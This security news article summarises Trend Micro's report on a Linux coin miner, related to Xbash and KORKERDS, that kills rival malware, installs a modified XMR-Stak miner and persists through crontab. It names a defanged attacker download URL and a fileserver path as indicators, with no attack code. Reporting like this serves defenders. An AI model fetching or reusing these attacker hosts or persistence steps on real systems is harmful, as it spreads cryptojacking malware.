Thursday, May 22, 2025
HomeComputer SecurityNew Linux Coin Miner that Deletes Other Linux Malware and Coin Miners

New Linux Coin Miner that Deletes Other Linux Malware and Coin Miners

Published on

SIEM as a Service

Follow Us on Google News

A new Linux coin miner that is capable of deleting previously installed Linux malware, coin miners and services associated with that including the connection ports.

Security researchers from TrendMicro observed the new coin miner and their scripts are matching to the Xbash features and KORKERDS.

“Noticing the script downloading the binary, we also looked at an analyzed code of KORKERDS modified and collected in November 2018 and found them almost the same except for a few additions and notable omissions.”

- Advertisement - Google News
Linux coin miner

The new miner doesn’t remove the security products in the system, instead, it kills components if the malware from where the script is copied.

A modified version of the cryptocurrency miner XMR-Stak that supports CPUs, AMD, and NVIDIA GPUs processors to download Cryptonight currencies. The infection starts with an IP camera where the attacker tries to upload a crontab file.

Researchers found the malware performs following three functions.

  • Function B kills previously installed malware
  • Function D downloads the coin miner
  • Function C downloads a script hxxp://yxarsh[.]shop/0 that creates a corntab and calls the script at 1 am.

The miner is capable of implanting themselves in the system root to survive reboots.

“We noted the subtle difference in the absence of the link placed in between the PUT URL /fileserver/vMROB4ZhfLTljleL and the actual crontab. While KORKERDS’ saves the crontab directly, the new script inserts just one crontab that fetches all the code and the miner,” reads Trend Micro report.

You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Hackers Target Mobile Users Using PWA JavaScript to Bypass Browser Security

A sophisticated new injection campaign has been uncovered, targeting mobile users through malicious third-party...

Docker Zombie Malware Infects Containers for Crypto Mining and Self-Replication

A novel malware campaign targeting containerized infrastructures has emerged, exploiting insecurely exposed Docker APIs...

Hackers Masquerade as Organizations to Steal Payroll Logins and Redirect Payments from Employees

ReliaQuest, hackers have deployed a cunning search engine optimization (SEO) poisoning scheme to orchestrate...

PupkinStealer Exploits Web Browser Passwords and App Tokens to Exfiltrate Data Through Telegram

A newly identified .NET-based information-stealing malware, dubbed PupkinStealer (also known as PumpkinStealer in some...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Hackers Target Mobile Users Using PWA JavaScript to Bypass Browser Security

A sophisticated new injection campaign has been uncovered, targeting mobile users through malicious third-party...

Docker Zombie Malware Infects Containers for Crypto Mining and Self-Replication

A novel malware campaign targeting containerized infrastructures has emerged, exploiting insecurely exposed Docker APIs...

Hackers Masquerade as Organizations to Steal Payroll Logins and Redirect Payments from Employees

ReliaQuest, hackers have deployed a cunning search engine optimization (SEO) poisoning scheme to orchestrate...